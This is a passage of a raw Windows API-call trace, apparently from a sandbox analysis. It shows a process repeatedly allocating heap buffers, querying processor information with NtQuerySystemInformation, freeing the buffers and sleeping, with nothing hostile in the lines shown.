SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.972] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0299.972] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0299.972] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0299.972] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0299.972] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0299.972] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0299.972] Sleep (dwMilliseconds=0x110) [0299.986] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0299.986] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.987] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0299.987] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0299.987] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.988] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0299.988] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0299.988] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.988] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0299.988] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0299.989] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0299.989] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0299.989] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0299.990] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0299.990] Sleep (dwMilliseconds=0x110) [0300.002] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0300.002] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.003] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0300.003] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0300.003] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.003] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0300.003] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b640 [0300.003] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b640, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b640, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.004] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b640 | out: hHeap=0x2560000) returned 1 [0300.004] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0300.004] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0300.004] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0300.004] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0300.005] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0300.005] Sleep (dwMilliseconds=0x110) [0300.017] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0300.017] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.018] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0300.018] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0300.018] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.018] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0300.019] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0300.019] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.019] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0300.019] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0300.019] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0300.020] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0300.020] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0300.020] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0300.020] Sleep (dwMilliseconds=0x110) [0300.030] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0300.030] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.031] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0300.031] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0300.031] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.034] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0300.034] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0300.034] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.034] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0300.035] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0300.035] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0300.035] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0300.035] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0300.035] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0300.036] Sleep (dwMilliseconds=0x110) [0300.046] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0300.046] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.046] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0300.046] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0300.046] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.047] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0300.047] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c2b8 [0300.047] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c2b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c2b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.047] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c2b8 | out: hHeap=0x2560000) returned 1 [0300.047] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0300.048] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0300.048] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0300.048] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0300.048] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0300.048] Sleep (dwMilliseconds=0x110) [0300.065] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0300.065] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.066] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0300.066] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0300.066] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.066] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0300.066] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c350 [0300.066] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c350, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c350, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.067] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c350 | out: hHeap=0x2560000) returned 1 [0300.067] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0300.067] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0300.067] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0300.067] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0300.068] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0300.068] Sleep (dwMilliseconds=0x110) [0300.091] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0300.091] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.092] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0300.092] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0300.092] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.093] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0300.093] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c0f0 [0300.093] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c0f0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c0f0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.093] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c0f0 | out: hHeap=0x2560000) returned 1 [0300.093] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0300.093] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0300.094] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0300.094] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0300.094] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0300.094] Sleep (dwMilliseconds=0x110) [0300.117] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0300.117] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.118] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0300.118] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0300.118] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.122] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0300.122] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0300.122] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.122] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0300.122] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c838 [0300.123] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c838, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c838, ResultLength=0x19ee88*=0xc0) returned 0x0 [0300.123] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c838 | out: hHeap=0x2560000) returned 1 [0300.123] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0300.123] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0300.123] Sleep (dwMilliseconds=0x110) [0300.139] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0300.139] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.139] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0300.140] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0300.140] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.140] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0300.140] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c350 [0300.140] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c350, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c350, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.141] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c350 | out: hHeap=0x2560000) returned 1 [0300.141] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0300.141] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0300.141] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0300.141] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0300.142] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0300.142] Sleep (dwMilliseconds=0x110) [0300.242] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0300.242] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.242] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0300.242] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0300.242] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.243] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0300.243] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0300.243] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.244] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0300.244] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0300.244] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0300.244] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0300.244] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0300.245] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0300.245] Sleep (dwMilliseconds=0x110) [0300.295] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0300.295] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.295] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0300.295] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0300.295] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.296] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0300.296] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0300.359] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.359] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0300.359] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0300.359] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0300.360] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0300.360] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0300.360] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0300.360] Sleep (dwMilliseconds=0x110) [0300.517] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0300.517] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.518] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0300.518] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0300.518] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.519] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0300.519] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0300.519] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.520] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0300.520] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0300.520] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0300.520] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0300.523] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0300.524] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0300.524] Sleep (dwMilliseconds=0x110) [0300.569] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0300.569] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.570] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0300.570] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0300.570] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.570] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0300.570] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0300.570] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.570] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0300.571] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0300.571] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0300.571] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0300.571] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0300.571] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0300.571] Sleep (dwMilliseconds=0x110) [0300.576] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0300.576] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.576] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0300.576] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0300.576] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.576] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: 